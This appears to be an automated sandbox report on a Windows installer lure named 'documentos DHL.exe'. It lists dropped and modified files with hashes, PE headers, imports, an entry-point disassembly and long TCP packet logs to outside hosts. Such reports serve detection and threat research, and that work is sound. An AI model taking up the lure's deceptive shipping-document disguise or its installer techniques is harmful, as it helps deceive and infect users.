C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll

Download File

Process:	C:\Users\user\Desktop\documentos DHL.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	19856
Entropy (8bit):	4.96426410091434
Encrypted:	false
SSDEEP:	384:GNe90VEZnTALI8BHHJOpA6nHPrrNUgNGcRr:Gg90WAI8BnJ1KTRr
MD5:	7DEA5DAB23582505C0EB671EF816C927
SHA1:	CBB8443E8511DF1A6CDBD5AB6D1A8982B881B52E
SHA-256:	C655C545DE5F07D85F588599043D8429CC7682FFA9E1DC55FD5275308ABCA20E
SHA-512:	BA054DF0AEDB086F2300AE5E3E2BB705256BFDDFC6BD24D37638A502B6B37150C6FCA1ACF28237B8BCCB95EE2D87633539E60D813EFC9C7C5EE49E36249B6361
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........D..>.....&"...%.....@......P................................................P....`... .........................................k....................P..................h............................B..(...................0................................text...(...........................`..`.data........0......."..............@....rdata.......@.......$..............@..@.pdata.......P.......,..............@..@.xdata.......`.......0..............@..@.bss.........p...........................edata..k............2..............@..@.idata...............4..............@....CRT....X............>..............@....tls.................@..............@....reloc..h............B..............@..B........................................................................................................................................................................

C:\Windows\Resources\0409\Transcriptive.ini

Download File

Process:	C:\Users\user\Desktop\documentos DHL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	34
Entropy (8bit):	4.253212018409155
Encrypted:	false
SSDEEP:	3:uyI6sJQ7n:uyeC7n
MD5:	7A4C132CE54889252F5A733BBC39C097
SHA1:	B235DE8CA2A3E8667B283AED77E3518C21925BE0
SHA-256:	FF5E7709D11246A22FD9D7532BD01A7E2BF640713521E9B5539C9B38D09A9433
SHA-512:	C9EFBD99C4C3930AD311DD761952902E93D38AC988BFC3959CE490B41B475E167AF865C63922606D7A7A0A79DFA44C348215356602E6E6AA4241FA033AA2C75A
Malicious:	false
Preview:	[Reproached222]..teenie=Firklang..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.448537030186477
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	documentos DHL.exe
File size:	339276
MD5:	ca1cd0656568af4f58aa28e61a3e3edb
SHA1:	1fde05eb6e587047d8a47950bcb2efdb53409b42
SHA256:	6931d5a8ac6e00c855139d9da394b7895d83a9a18a8974c0b2381c5a28e68678
SHA512:	bfd4b3dfe4a78d2e1a4c94a78c633ba5dcef7ad9abe209fce6dbe123538b3bdbcf9c5e2de4a35d24237a663188ed6475810f9f686b9429f782bb16a819febc7a
SSDEEP:	6144:YIw3Q/Id1TZuGuUbWNTarTP6oJgZqI5wyqYVyQH:TQPYG/WZaXP6oN2wJ27
TLSH:	7974C0462360D13BFDBE0770B82710937995AC1675BCC0AAF29CB69D67F31620B2A771
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

File Icon


Icon Hash:	8660f0e68af8388d

Static PE Info

General

Entrypoint:	0x403489
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F7CDCCE8193h
push ebx
call 00007F7CDCCEB441h
cmp eax, ebx
je 00007F7CDCCE8189h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F7CDCCEB3BBh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F7CDCCE816Ch
push 0000000Ah
call 00007F7CDCCEB414h
push 00000008h
call 00007F7CDCCEB40Dh
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F7CDCCEB401h
cmp eax, ebx
je 00007F7CDCCE8191h
push 0000001Eh
call eax
test eax, eax
je 00007F7CDCCE8189h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5e000	0x28868	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63d1	0x6400	False	0.66515625	data	6.479451209065	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.45	data	5.143831732151552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	False	0.501953125	data	4.000739070159718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x33000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5e000	0x28868	0x28a00	False	0.28479567307692305	data	4.106888119561181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x5e3b8	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x5e720	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States
RT_ICON	0x6ef48	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States
RT_ICON	0x783f0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States
RT_ICON	0x7d878	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States
RT_ICON	0x81aa0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x84048	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x850f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x85a78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x85ee0	0x144	data	English	United States
RT_DIALOG	0x86028	0x13c	data	English	United States
RT_DIALOG	0x86168	0x100	data	English	United States
RT_DIALOG	0x86268	0x11c	data	English	United States
RT_DIALOG	0x86388	0xc4	data	English	United States
RT_DIALOG	0x86450	0x60	data	English	United States
RT_GROUP_ICON	0x864b0	0x76	data	English	United States
RT_MANIFEST	0x86528	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 19:03:18.615021944 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.615070105 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.615206957 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.639564991 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.639585018 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.677011967 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.677251101 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.677993059 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.678250074 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.913369894 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.913429976 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.914542913 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:18.914834023 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.933219910 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:18.980402946 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:19.381166935 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:19.381335974 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:19.381417036 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:19.381680965 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:19.381733894 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:19.381897926 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:19.382034063 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:19.382050991 CET	443	49802	142.250.74.206	192.168.11.20
Nov 28, 2022 19:03:19.382185936 CET	49802	443	192.168.11.20	142.250.74.206
Nov 28, 2022 19:03:19.544370890 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.544482946 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.544661045 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.545027018 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.545068026 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.601592064 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.601780891 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.601839066 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.602772951 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.603266001 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.606729031 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.606743097 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.607040882 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:19.607247114 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.607765913 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:19.648458004 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.017338037 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.017560959 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.017635107 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.017712116 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.017822981 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.017864943 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.017889977 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.018009901 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.019331932 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.019500017 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.019557953 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.020034075 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.020205021 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.020205975 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.020286083 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.020354033 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.020477057 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.020766973 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.021039963 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.021116972 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.021365881 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.021579981 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.021781921 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.028414011 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.028592110 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.028697968 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.028853893 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.028918028 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.029164076 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.029230118 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.029441118 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.029491901 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.029648066 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.029702902 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.029735088 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.029911041 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.029911995 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.029992104 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.030206919 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.030698061 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.030905962 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.030972958 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.031176090 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.031251907 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.031435966 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.031749964 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.032052040 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.032118082 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.032354116 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.032409906 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.032641888 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.032717943 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.032777071 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.032818079 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.033026934 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.033077002 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.033278942 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.033329010 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.033663034 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.033716917 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.033982038 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.034034014 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.034249067 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.034293890 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.034545898 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.034583092 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.034791946 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.034807920 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.035021067 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.035330057 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.035479069 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.035533905 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.035711050 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.035753012 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.035959959 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.036010981 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.036166906 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.036207914 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.036382914 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.036550045 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.036808968 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.036874056 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.037079096 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.037194014 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.037409067 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.037465096 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.037708044 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.037724018 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.037888050 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.037895918 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.038065910 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.038827896 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039043903 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039057016 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039218903 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039222956 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039232016 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039416075 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039424896 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039531946 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039551973 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039750099 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039762020 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.039983034 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.039989948 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.040127039 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.040503025 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.040642977 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.040694952 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.040708065 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.040782928 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.040873051 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.041290998 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.041440964 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.041451931 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.041624069 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.041650057 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.041661978 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.041802883 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.041802883 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.042257071 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.042376041 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.042424917 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.042439938 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.042542934 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.042701006 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043015003 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.043143988 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043157101 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.043389082 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.043396950 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043410063 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.043529987 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043529987 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043540955 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.043732882 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.043968916 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.044133902 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.044146061 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.044322014 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.044331074 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.044492960 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.044677973 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.044847965 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.044862032 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.044872046 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.045041084 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.045547962 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.045655012 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.045708895 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.045721054 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.045815945 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.045938969 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.046175003 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.046308994 CET	49803	443	192.168.11.20	142.250.186.65
Nov 28, 2022 19:03:20.046319008 CET	443	49803	142.250.186.65	192.168.11.20
Nov 28, 2022 19:03:20.046461105 CET	49803	443	192.168.11.20	142.250.186.65
